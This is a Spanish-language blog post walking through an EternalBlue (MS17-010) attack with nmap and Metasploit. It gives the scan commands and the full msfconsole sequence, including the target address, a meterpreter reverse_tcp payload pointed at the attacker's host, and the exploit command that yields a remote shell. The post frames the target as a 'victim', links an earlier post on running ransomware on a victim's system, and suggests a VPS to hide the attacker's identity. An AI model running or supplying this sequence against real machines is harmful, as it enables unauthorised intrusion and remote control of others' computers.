Saludos mis queridos fieles lectores, luego de ver algunos mensajes de nuestros seguidores respecto al Exploit MS17-010 EternalBlue.
Si bien es cierto este Exploit fue publicado gracias a una fuga de información - "Leak".
Afecto a muchas empresas a nivel mundial aprovechando la vulnerabilidad SMB en el puerto 445 para ejecutar códigos maliciosos remotamente, efectuando ataques APT'S mundiales como el ransomware "Wannacry" y "Petya"
En el anterior POST enseñe como puedes ejecutar este ransomware en el sistema de tu victima:
https://www.backtrackomar.com/2017/09/generando-payloads-con-chaos-framework.html
¿Como funciona Eternalblue?
EternalBlue aprovecha una vulnerabilidad en la implementación del protocolo Server Message Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar código en el ordenador en cuestión.
Referencia: https://es.wikipedia.org/wiki/EternalBlue
Comencemos
El exploit se encuentra en los repertorios de msfconsole instalado, si no lo tienes actualizalo.root@kali:/# apt update && apt upgrade && apt dist-upgrade
Otra alternativa:
root@kali:/# msfupdate
Bueno lo primero que debes hacer tu como "Analizador" en un entorno real "Abrir los puertos de tu Router" o elaborarlo desde un VPS (Por su seguridad de identidad si el caso lo a merita)
En primer instancia haremos un escaneo en mi red local para encontrar los dispositivos conectados:
Nmap - Mapeando redes y verificando que puertos tienen abiertos:
root@kali:/# nmap 192.168.1.1/24 -O sU -sT
Nuestro objetivo tiene el puerto 445 y por lo que nos indica Nmap corre Windows 7 por la cantidad de repeticiones.
Vamos a utilizar el script " de análisis vulnerabilidades de nmap para testear si es vulnerable.
root@kali:/# nmap --script smb-vuln-ms17-010.nse -p445 192.168.1.3
root@kali:/# service postgresql start
root@kali:/# msfconsole
-------------------------------------------------------------------------------------------------------------------------
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.33
lhost => 192.168.1.33
msf exploit(ms17_010_eternalblue) > exploit
--------------------------------------------------------------------------------------------------------------------------
Luego que se ejecute el código malicioso remotamente, hemos tenido la sesión meterpreter de nuestra victima:
El sistema esta completamente comprometido, si deseas interactuar el S.O de la victima te dejo un articulo de hace años. se que te ayudara.
! Saludos !
0 comentarios:
Publicar un comentario